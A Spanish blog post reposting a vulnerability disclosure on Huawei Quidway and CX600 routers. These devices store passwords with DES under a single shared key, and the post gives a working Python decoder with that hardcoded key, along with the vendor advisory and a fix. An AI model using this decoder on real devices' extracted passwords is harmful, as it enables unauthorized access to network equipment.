English plantillas curriculums vitae French cartas de amistad German documental Spain cartas de presentación Italian xo Dutch películas un link Russian templates google Portuguese foro de coches Japanese catálogos de Korean entrevistas a Arabic Chinese Simplified

TIENDAS WIFI:


Lo mejor en calidad-precio y rapidez bajo nuestra humilde opinión.
eiUFj

jueves, 22 de noviembre de 2012


 Routers Huawei  al DESCUBIERTO:

Para routers:



Huawei Quidway series
Huawei CX600

Otros modelos también pueden ser vulnerables,pero no fueron probados.


DETALLES DE LA VULNERABILIDAD:

Dispositivos de Huawei tienen un algoritmo de cifrado de contraseñas débiles. Con este esquema, las contraseñas son ofuscadas  y cifradas con DES, usando una clave de cifrado compartida entre todos los dispositivos afectados. Este esquema de cifrado no utiliza ningún mecanismo contraseña salteada. Como consecuencia, las contraseñas extraídas del dispositivo de una víctima puede ser descifrada de forma instantánea.

Un procedimiento de Python que decodifica una contraseña dada se incluye a continuación. Una vez terminado, el procedimiento decrypt_password () devuelve la contraseña en texto claro.

CÓDIGO:


from Crypto.Cipher import DES
def decode_char(c):
    if c == 'a':
        r = '?'
    else:
        r = c
    return ord(r) - ord('!')
def ascii_to_binary(s):
    assert len(s) == 24
    out = [0]*18
    i = 0
    j = 0
    for i in range(0, len(s), 4):
        y = decode_char(s[i + 0])
        y = (y << 6) & 0xffffff
        k = decode_char(s[i + 1])
        y = (y | k) & 0xffffff
        y = (y << 6) & 0xffffff
        k = decode_char(s[i + 2])
        y = (y | k) & 0xffffff
        y = (y << 6) & 0xffffff
        k = decode_char(s[i + 3])
        y = (y | k) & 0xffffff
        out[j+2] = chr(y       & 0xff)
        out[j+1] = chr((y>>8)  & 0xff)
        out[j+0] = chr((y>>16) & 0xff)
        j += 3
    return "".join(out)
def decrypt_password(p):
    r = ascii_to_binary(p)
    r = r[:16]
    d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
    r = d.decrypt(r)
    return r.rstrip("\x00")
SOLUCIÓN: 
 Se recomienda almacenar las contraseñas utilizando un algoritmo de hash correcto, en lugar de aprovechar el cifrado simétrico. Por el momento, esta cuestión ha sido abordada por Huawei con aviso de seguridad Huawei-SA-20120827-01-CX600 ("Actualización asesoramiento de seguridad sobre el riesgo de que alguien irrumpa Contraseña Debido al algoritmo de cifrado DES"). Más detalles están disponibles en la siguiente URL:

http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141
AGRADECIMIENTOS:
 http://blog.emaze.net/
(No nos hacemos responsables del mal uso de esto) 

2 comentarios:

  1. ALGUIEN PUEDE SUBIR EL SCRIPT YA CREADO?¿? ME DA ERROR AL CREARLO. ¡¡¡GRACIAS!!! ;)

    ResponderEliminar
  2. hola por favor alguien lo explica mejor... es que no tengo ni pu** idea de lo que hay que hacer... :´(

    ResponderEliminar